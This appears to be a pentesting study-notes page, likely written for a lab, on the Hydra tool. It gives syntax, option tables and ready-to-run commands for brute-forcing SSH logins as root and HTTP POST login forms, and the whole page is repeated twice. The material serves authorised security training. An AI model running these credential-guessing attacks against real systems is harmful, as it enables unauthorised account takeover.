Hydra - Commands

Basic Syntax

hydra -l user -P /path/to/passlist <MACHINE_IP> <protocol>

Option

Description

-l

specifies the username for login

-P

indicates a list of passwords

-t

sets the number of threads to spawn

Other options:

-L : indicates a list of username

Brute Forcing Some Protocols

SSH

Command:

hydra -l <username> -P <full path to pass> 10.10.25.152 -t 4 ssh

Example:

hydra -l root -P passwords.txt 10.10.25.152 -t 4 ssh

Post Web Form

Syntax:

sudo hydra -l <username> -P <password_list> <MACHINE_IP> http-post-form "<path>:<login_credentials>:<invalid_response>"

Option

Description

-l

the username for (web form) login

-P

the password list to use

http-post-form

the type of the form is POST

<path>

the login page URL, for example, login.php

<login_credentials>

the username and password used to log in, for example, username=^USER^&password=^PASS^

<invalid_response>

part of the response when the login fails

-V

verbose output for every attempt

Example:

hydra -l <username> -P <wordlist> 10.10.25.152 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

The login page is /login.
The username is the form field where the username is entered
The specified username(s) will replace ^USER^
The password is the form field where the password is entered
The provided passwords will be replacing ^PASS^
Finally, F=incorrect is a string that appears in the server reply when the login fails

PreviousHydra - Intro NextSQLMap

Last updated 8 months ago

Hydra - Commands

Basic Syntax

hydra -l user -P /path/to/passlist <MACHINE_IP> <protocol>

Option

Description

-l

specifies the username for login

-P

indicates a list of passwords

-t

sets the number of threads to spawn

Other options:

-L : indicates a list of username

Brute Forcing Some Protocols

SSH

Command:

hydra -l <username> -P <full path to pass> 10.10.25.152 -t 4 ssh

Example:

hydra -l root -P passwords.txt 10.10.25.152 -t 4 ssh

Post Web Form

Syntax:

sudo hydra -l <username> -P <password_list> <MACHINE_IP> http-post-form "<path>:<login_credentials>:<invalid_response>"

Option

Description

-l

the username for (web form) login

-P

the password list to use

http-post-form

the type of the form is POST

<path>

the login page URL, for example, login.php

<login_credentials>

the username and password used to log in, for example, username=^USER^&password=^PASS^

<invalid_response>

part of the response when the login fails

-V

verbose output for every attempt

Example:

hydra -l <username> -P <wordlist> 10.10.25.152 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

The login page is /login.
The username is the form field where the username is entered
The specified username(s) will replace ^USER^
The password is the form field where the password is entered
The provided passwords will be replacing ^PASS^
Finally, F=incorrect is a string that appears in the server reply when the login fails

PreviousHydra - Intro NextSQLMap

Last updated 8 months ago